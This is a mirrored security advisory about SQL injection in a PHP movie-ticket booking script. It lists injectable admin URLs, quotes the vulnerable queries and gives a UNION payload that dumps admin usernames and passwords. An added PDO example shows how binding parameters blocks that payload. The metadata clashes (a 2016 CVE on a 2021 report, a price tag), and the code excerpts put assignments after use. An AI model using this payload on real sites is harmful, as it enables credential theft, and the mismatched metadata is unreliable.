Online Movie Ticket Booking - SQL injection

CVE: CVE-2016-10693
Category: CWE-89
Price: $5000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-06-09
CPE: cpe:cpe:/a:online-movie-ticket-booking:sql-injection
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060058

Below is a copy:

Online Movie Ticket Booking - SQL injection
# Exploit Title: Online Movie Ticket Booking  - SQL injection
# Date: 2021-06-04
# Exploit Author: Mostafa Farzaneh
# Vendor Homepage: https://github.com/vydyas
# Software Link: https://github.com/vydyas/Online-Movie-Ticket-Booking-Script-Free
# Tested on: Ubuntu 
# Version: 1.00



# This web application contains several SQL injection vulnerabilities in the following paths:
http://localhost/admin/agent-login.php?username=&password=
http://localhost/admin/get_ticket.php?ticketid=
http://localhost/admin/edit_theatre.php?id=
http://localhost/admin/get_movie.php?loc_id=
http://localhost/admin/get_agents.php?loc_id=
http://localhost/admin/get_movie_timings.php?movie_id=&loc_id=
http://localhost/admin/addmovies_process.php?movie_name=
http://localhost/admin/delete.php?id=
http://localhost/admin/get_customer_booking.php?clocation=&ctheatre=
http://localhost/admin/add_agent_process.php?theatre_name=

# PoC :

- Vulnerable code:

get_customer_booking.php:
$sql = "select * from assign_show where fk_location_id = '$clocation' and fk_theater_id = '$ctheatre'";
$clocation = $_REQUEST['clocation'];
$ctheatre = $_REQUEST['ctheatre'];

add_agent_process:
$query1 = mysql_query("SELECT * FROM agent WHERE username='$theatre_name' ");
$theatre_name = $_POST['theatre_name'];

delete.php:
$sql = "delete from location where id='$id'";
$id = $_GET['id'];

addmovies_process.php:
$query1 = mysql_query("SELECT * FROM movies WHERE name='$movie_name' ");
$movie_name = $_POST['movie_name'];

get_movie_timings:
$sql1 = "select * from theatres where movies_id = '$movie_id' and location_id='$loc_id'";
$movie_id = $_REQUEST['movie_id'];
$loc_id = $_REQUEST['loc_id'];

get_agents.php:
$sql = "SELECT * FROM agent where fk_location_id=$loc_id ";
$loc_id = $_REQUEST['loc_id'];

get_movie.php:
$sql = "SELECT movies.name,movies.id,todate FROM assign_show join movies on assign_show.fk_movie_id = movies.id where assign_show.fk_location_id='$loc_id' order by movies.id desc";
$loc_id = $_REQUEST['loc_id'];

edit_theatre.php:
$query = mysql_fetch_array(mysql_query("SELECT * FROM theatres WHERE id='$id'"));
$id = $_REQUEST['id'];

agent-login.php:
$query = mysql_query("select * from agent where username='$username' and password='$password'");
loginagent($username, $password)
loginagent($username, $password)

get_ticket:
$sql1 = "select customer_details.cust_id,customer_details.name,customer_details.email,customer_details.mobile from customer_booking join customer_details on customer_booking.fk_cust_id = customer_details.cust_id where fk_cust_id = '$ticket' group by fk_cust_id";
$ticketid = $_REQUEST['ticketid'];


- Payload:

http://localhost/get_movie_timings?movie_id='+union+select+1,group_concat(username,':',password) from admin-- -&loc_id=

********************************************************* 
#Discovered by: Mostafa Farzaneh
#Telegram: @pyweb_security
*********************************************************
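
A hardened form of the get_movie_timings query listed under "Vulnerable code", added here as an example; it is not part of the original advisory or the project's own code. It assumes PDO with the pdo_sqlite driver as an in-memory stand-in for MySQL; the function name theatres_for_show, the `name` column and the sample rows are constructed for the demo.

```php
<?php
// Added example: validate, then bind, instead of interpolating request values.
// Assumptions: PDO + pdo_sqlite (stand-in for MySQL); the function name,
// the `name` column and the sample rows are constructed for this demo.

function theatres_for_show(PDO $db, $movie_id, $loc_id): array
{
    // 1. Validate: both parameters are numeric keys, so reject anything else.
    $opts  = ['options' => ['min_range' => 1]];
    $movie = filter_var($movie_id, FILTER_VALIDATE_INT, $opts);
    $loc   = filter_var($loc_id, FILTER_VALIDATE_INT, $opts);
    if ($movie === false || $loc === false) {
        throw new InvalidArgumentException('movie_id and loc_id must be positive integers');
    }
    // 2. Bind: placeholders keep request values out of the SQL text entirely.
    $stmt = $db->prepare(
        'SELECT id, name FROM theatres WHERE movies_id = :movie AND location_id = :loc'
    );
    $stmt->bindValue(':movie', $movie, PDO::PARAM_INT);
    $stmt->bindValue(':loc', $loc, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE theatres (id INTEGER PRIMARY KEY, name TEXT, movies_id INTEGER, location_id INTEGER)');
$db->exec("INSERT INTO theatres (name, movies_id, location_id) VALUES ('Screen 1', 7, 3), ('Screen 2', 8, 3)");

// Constructed requests: one legitimate, one carrying the movie_id value
// from the payload quoted in the advisory above.
$requests = [
    ['movie_id' => '7', 'loc_id' => '3'],
    ['movie_id' => "' union select 1,group_concat(username,':',password) from admin-- -", 'loc_id' => ''],
];
foreach ($requests as $req) {
    try {
        $rows = theatres_for_show($db, $req['movie_id'], $req['loc_id']);
        echo count($rows), ' row(s): ', json_encode($rows), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The same validate-then-bind pattern applies to every path in the list above, using PDO or mysqli against MySQL; the mysql_* functions in the excerpts were removed in PHP 7.0.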
